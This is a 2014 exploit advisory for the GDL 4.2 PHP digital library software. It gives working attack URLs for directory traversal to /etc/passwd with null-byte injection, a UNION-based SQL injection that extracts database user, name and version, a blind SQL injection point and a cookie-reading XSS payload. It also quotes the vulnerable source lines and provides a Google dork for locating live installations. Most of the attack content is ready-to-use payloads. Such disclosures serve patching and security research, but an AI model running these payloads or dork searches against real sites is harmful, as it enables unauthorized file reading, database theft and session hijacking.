GDL 4.2 - Multiple Vulnerabilities

2014-02-27T00:00:00
ID EXPLOITPACK:5928817A85D8E17D96FABAC87265C70C
Type exploitpack
Reporter ByEge
Modified 2014-02-27T00:00:00

Description

GDL 4.2 - Multiple Vulnerabilities

                                        
                                            -> Title        : GDL 4.2 Multiple Vulnerabilities

-> Down. Script : http://kmrg.itb.ac.id/ - http://kmrg.itb.ac.id/gdl42.zip

-> Author       : ByEge

-> Home         : http://byege.blogspot.com.tr/

-> Tested       : Apache/2.2.22 (Win32) PHP/5.4.3

-> Date         : 26/02/2014

-> Google Dork  : "Powered by GDL 4.2"  And "gdl.php?mod=browse"

-> Thanks       : F0RTYS3V3N  - Cyb3rking - ameN

-> Keyfi        : http://www.youtube.com/watch?v=wKGMk56zSPI --> Yaz dostum boşa geçmiş ömre yaşam denir mi ?

-> Not          : Kendini geliştirmek isteyen arkadaşlar kod analizi için kullanabilirsiniz scripti, bir çok güvenlik zaafiyeti var.


###################################
#Directory traversal vulnerability#
###################################
http://localhost/gdl.php?newlang=../../../../../../../../../../etc/passwd%00
http://localhost/index.php?newlang=../../../../../../../../../../etc/passwd%00
Line : gdl42/class/session.php   96 - 99  parameter : newlang


		// Setting bahasa
		$lang = $_COOKIE['gdl_lang'];
		$newlang = $_GET['newlang'];
		
		if (isset($newlang)) {
			if (file_exists("./lang/$newlang.php")) {
				setcookie("gdl_lang",$newlang,time()+($gdl_sys['page_caching'] * 60));
				$gdl_content->language=$newlang;
			} else {
				setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60));
				$gdl_content->language=$gdl_sys['language'];
			}
			
		} elseif (isset($lang)) {
			$gdl_content->language=$lang;
		}else{
			setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60));
			$gdl_content->language=$gdl_sys['language'];
		}
	}
		
	function set_theme(){
		global $gdl_content, $gdl_sys;
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
http://localhost/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00
http://localhost/index.php?newtheme=../../../../../../../../../../etc/passwd%00
Line : gdl42/class/session.php  120 - 123  parameter : newtheme

		$theme = $_COOKIE['gdl_theme'];
		$newtheme = $_GET['newtheme'];
		
		if (isset($newtheme)) {
			if (file_exists("./theme/$newtheme/theme.php")) {
				setcookie("gdl_theme",$newtheme,time()+($gdl_sys['page_caching'] * 60));
				$gdl_content->theme=$newtheme;
			} else {
				setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60));
				$gdl_content->theme=$gdl_sys['theme'];
			}
			
		} elseif (isset($theme)) {
			$gdl_content->theme=$theme;
		}else{
			setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60));
			$gdl_content->theme=$gdl_sys['theme'];
		}

	}
	
	function login($userid,$password) {
		global $gdl_auth,$gdl_sys;
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
#############################
#SQL Injection vulnerability#
#############################
http://localhost/download.php?id=injecthere
Line : gdl42/download.php  18 - 24  parameter : id

$file_id = $_GET['id'];

function download_redirect(){
	
	global $file_id,$gdl_db,$gdl_metadata,$gdl_publisher,$gdl_session,$gdl_publisher2;
	
	$dbres = $gdl_db->select("relation","part,path,identifier,uri","relation_id=$file_id");
	$file_target=@mysql_result($dbres,0,"path");
	$file_part=@mysql_result($dbres,0,"part");
	$publisher = $gdl_metadata->get_publisher(@mysql_result($dbres,0,"identifier"));

--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
###################################
#Blind SQL Injection vulnerability#
###################################
http://localhost/gdl.php?mod=browse&newlang=english&op=comment&page=read&id=injecthere
Line : gdl42/main.php 119  parameter : id
if ((file_exists("./theme/".$gdl_content->theme."/".$gdl_content->theme."_print.css"))&& ($_GET['mod']== "browse") && ($_GET['op']=="read") && (! empty ($_GET['id'])))
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
########################################
#Cross site scripting xss vulnerability#
########################################
http://localhost/gdl.php?mod=search&action=ByEge&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK
Line : module/search/function.php 38 parameter : keyword

###############################################################################################################################################################################
###############################################################################################################################################################################

Test Vulnerability :
http://server/download.php?id=null/**/and/**/true/**/UNION/**/SELECT/**/CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2--
http://server/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00
http://server/gdl.php?newlang=../../../../../../../../../../etc/passwd%00
http://server/gdl.php?mod=search&action=folks&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK